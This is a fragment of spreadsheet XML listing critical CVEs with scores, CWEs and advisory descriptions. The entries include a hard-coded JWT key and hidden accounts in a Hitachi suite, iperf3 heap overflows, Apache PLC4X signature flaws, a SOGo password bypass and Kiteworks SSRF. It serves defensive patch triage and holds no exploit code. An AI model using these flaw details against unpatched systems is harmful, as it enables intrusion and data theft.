      <c r="D31" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Missing Authentication for Critical Function. This allows an unauthenticated attacker to invoke a critical API, potentially leading to unauthorized retrieval or alteration of sensitive information, or unauthorized manipulation.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82825</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82827</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Use of Hard-coded Cryptographic Key. The Hardcoding of JWT signing secret key allows an attacker to generate unauthorized Bearer tokens and exploit administrative functions.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82827</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82829</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to Hidden Functionality vulnerability which allows an attacker to gain unauthorized access by exploiting hidden accounts or hard coded credentials.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82829</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96822</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in Books Gallery &lt;= 4.8.3 versions.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96822</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101276</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.21 (esnet/iperf) contains a remote, unauthenticated heap use-after-free: the server's per-test watchdog server_timer_proc() frees streams without cancelling/joining their worker threads, so a blocked worker dereferences a freed iperf_stream; fixed in 3.22.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101276</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101283</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.20–3.21 (esnet/iperf) has a pre-auth heap buffer overflow in decrypt_rsa_message(): a 256-byte RSA buffer is BIO_read with the attacker-controlled ciphertext length (guard warns only), so an unauthenticated client overflows the heap via an oversized authtoken; fixed in 3.22</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101283</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102508</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347, CWE-757</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature and Improper Certificate Validation in the OPC UA driver of Apache PLC4X (PLC4J) allows an attacker in a network position between client and server to impersonate the OPC UA server and to read, forge or modify secure-channel traffic, including user credential ssent by the client.
The defect manifests differently depending on the version:
- In 0.9.0 through 0.11.0 a failed message-signature check is only logged and never enforced, and there is no mechanism to verify the server certificate: it is taken from the unauthenticated GetEndpoints discovery response and used to encrypt the user's password.
- In 0.12.0 through 0.13.1 the signature check is inverted (valid signatures are rejected, invalid ones accepted), and server certificates are accepted without a trust anchor by default.
- In all affected versions the default security policy is None. Starting with 0.12.0 the driver additionally continues silently at a weaker security policy than the one configured, and starting with 0.13.0 endpoint selection prefers the weakest matching endpoint.
Users checking only for one of these mechanisms may wrongly conclude they are unaffected.
This issue affects Apache PLC4X: from 0.9.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 verifies message signatures correctly, refuses to connect unless the server certificate can be verified against a configured trust store or pinned certificate, defaults to Basic256Sha256 with SignAndEncrypt, and fails the
connection if the negotiated security policy is weaker than the configured one.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102508</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102992</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>piscina is a node.js worker pool implementation. Prior to 4.9.4, 5.3.2, and 6.0.0-rc.5, Piscina stores ThreadPool.options in src/index.ts as a plain object that inherits from Object.prototype. Applications with a separate prototype-pollution primitive can therefore supply inherited values for security-sensitive options that do not have own defaults. An inherited execArgv value is passed to the Node.js Worker constructor and can preload attacker-controlled code in worker threads, an inherited loadBalancer function can execute during task scheduling, and inherited env values can alter worker environments. This issue is fixed in versions 4.9.4, 5.3.2, and 6.0.0-rc.5.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102992</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103547</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>In ldapd in OpenBSD 7.8 before errata 057 and 7.9 before errata 021, delegated BSD authentication results are correlated only by the LDAP child process client file descriptor and LDAP message ID. After a connection closes, a later connection that reuses the same file descriptor and message ID can receive the earlier authentication result. A remote attacker who can reach ldapd can complete a Bind as another identity. A missing connection can also cause a NULL pointer dereference. (ldapd is not enabled by default.)</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103547</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19445</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A remote, unauthenticated TLS client can make a server crash or call
through a freed pointer if its sni_callback assigns a different context to
SSLSocket.context (the documented way to select a certificate per server
name) and nothing else keeps the original ssl.SSLContext alive. Typical
cases are servers that create an SSLContext per connection or replace it
while connections are open; servers that wrap their listening socket with
it are not affected.
Mitigation: keep a reference to every SSLContext that sets sni_callback for
the lifetime of the server. TLS clients are not affected.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19445</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74865</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter "SOGoTrustProxyAuthentication=YES". This causes the password to be bypassed during HTTP Basic authentication. An unauthenticated attacker who provides the username of an existing user and any arbitrary password can successfully log in to that user's account.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74865</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102095</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Server-Side Request Forgery. Kiteworks Email Protection Gateway performed server-side fetches of URLs contained in the message content it processed, without adequately restricting the fetch destination. A remote, unauthenticated sender could craft a message that caused the gateway to issue requests to internal services and cloud instance metadata endpoints and return the responses, potentially disclosing sensitive internal data and, depending on the internal service reached, affecting its state.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102095</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102102</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S43"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an issuer certificate in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102102</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102103</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S44"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 certificate revocation list in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102103</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102104</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S45"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performs an online certificate status check for an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102104</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102105</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
